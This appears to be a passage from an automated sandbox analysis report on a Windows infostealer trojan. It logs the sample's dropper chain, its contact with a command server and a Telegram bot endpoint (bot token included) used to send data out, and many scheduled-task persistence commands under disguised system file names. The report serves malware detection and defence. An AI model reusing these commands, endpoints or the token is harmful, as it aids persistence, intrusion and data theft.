                                    Source: global trafficDNS traffic detected: DNS query: 250345cm.renyash.ru
                                    Source: unknownHTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="41e39329-f7ed-4a24-a87a-8d5d41ec4466"Host: api.telegram.orgContent-Length: 86650Expect: 100-continueConnection: Keep-Alive
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.reP
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.reP2y
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru/
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru/sqltemp.php
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002BA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ruve
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.0000000002E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.00000000030FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                    Source: fontdrvhost.exe, 00000005.00000002.2218252211.0000000000D22000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, BoUXaXGR.log.5.dr, LtQnCbUd.log.24.drString found in binary or memory: https://api.telegram.org/bot
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoX
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: fontdrvhost.exe, 00000005.00000002.2218593117.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                                    Source: fontdrvhost.exe, 00000005.00000002.2218252211.0000000000D22000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, BoUXaXGR.log.5.dr, LtQnCbUd.log.24.drString found in binary or memory: https://ipinfo.io/country
                                    Source: fontdrvhost.exe, 00000005.00000002.2218252211.0000000000D22000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, BoUXaXGR.log.5.dr, LtQnCbUd.log.24.drString found in binary or memory: https://ipinfo.io/ip
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://support.mozilla.org
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org#
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                                    Source: AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                                    Source: 4lvmN5MENl.24.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49710 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49712 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49779 version: TLS 1.2
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B86FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00B86FAA
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\IME\IMEKR\fdadf3e88d0159Jump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8848E0_2_00B8848E
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B900B70_2_00B900B7
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B940880_2_00B94088
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B840FE0_2_00B840FE
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BA51C90_2_00BA51C9
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B971530_2_00B97153
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B832F70_2_00B832F7
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B962CA0_2_00B962CA
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B943BF0_2_00B943BF
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8C4260_2_00B8C426
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8F4610_2_00B8F461
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BAD4400_2_00BAD440
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B977EF0_2_00B977EF
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BAD8EE0_2_00BAD8EE
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8286B0_2_00B8286B
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8E9B70_2_00B8E9B7
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BB19F40_2_00BB19F4
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B96CDC0_2_00B96CDC
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B93E0B0_2_00B93E0B
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BA4F9A0_2_00BA4F9A
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8EFE20_2_00B8EFE2
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 5_2_00007FFD34550D485_2_00007FFD34550D48
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 5_2_00007FFD34550E435_2_00007FFD34550E43
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 5_2_00007FFD349400825_2_00007FFD34940082
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34560D4824_2_00007FFD34560D48
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34560E4324_2_00007FFD34560E43
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD3457000024_2_00007FFD34570000
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD3459FDF924_2_00007FFD3459FDF9
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD345912E524_2_00007FFD345912E5
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD3459F7F824_2_00007FFD3459F7F8
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34951E1024_2_00007FFD34951E10
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD3495008524_2_00007FFD34950085
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34A831F024_2_00007FFD34A831F0
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34A8974824_2_00007FFD34A89748
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 25_2_00007FFD34560D4825_2_00007FFD34560D48
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD3457000030_2_00007FFD34570000
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD34560D4830_2_00007FFD34560D48
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD34560E4330_2_00007FFD34560E43
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD345912E530_2_00007FFD345912E5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 30_2_00007FFD3459D45530_2_00007FFD3459D455
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD34570D4831_2_00007FFD34570D48
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD34570E4331_2_00007FFD34570E43
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD3458000031_2_00007FFD34580000
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345A12B131_2_00007FFD345A12B1
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345A12E531_2_00007FFD345A12E5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 31_2_00007FFD345AD45531_2_00007FFD345AD455
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD3458000040_2_00007FFD34580000
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD34570D4840_2_00007FFD34570D48
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD34570E4340_2_00007FFD34570E43
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345A12B140_2_00007FFD345A12B1
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345A12E540_2_00007FFD345A12E5
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 40_2_00007FFD345AD45540_2_00007FFD345AD455
                                    Source: Joe Sandbox ViewDropped File: C:\Drivers\fontdrvhost.exe C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                    Source: Joe Sandbox ViewDropped File: C:\Program Files\Internet Explorer\en-US\conhost.exe C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: String function: 00B9F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: String function: 00B9EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: String function: 00B9EB78 appears 39 times
                                    Source: eP6sjvTqJa.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs eP6sjvTqJa.exe
                                    Source: eP6sjvTqJa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: fontdrvhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AdbXCBUViTnoVBSsOq.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: backgroundTaskHost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AdbXCBUViTnoVBSsOq.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: conhost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: AdbXCBUViTnoVBSsOq.exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@40/51@3/3
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B86C74 GetLastError,FormatMessageW,0_2_00B86C74
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00B9A6C2
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\OwXMDaSq.logJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeMutant created: NULL
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeMutant created: \Sessions\1\BaseNamedObjects\Local\fontdrvhost
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\AppData\Local\Temp\GxxkeYPkalJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCommand line argument: sfxname0_2_00B9DF1E
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCommand line argument: sfxstime0_2_00B9DF1E
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCommand line argument: STARTDLG0_2_00B9DF1E
                                    Source: eP6sjvTqJa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: eP6sjvTqJa.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: BQS1omMoER.24.dr, e7yBZipER6.24.dr, PcelLUrJfI.24.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: eP6sjvTqJa.exeVirustotal: Detection: 59%
                                    Source: eP6sjvTqJa.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeFile read: C:\Users\user\Desktop\eP6sjvTqJa.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\eP6sjvTqJa.exe "C:\Users\user\Desktop\eP6sjvTqJa.exe"
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\user\backgroundTaskHost.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
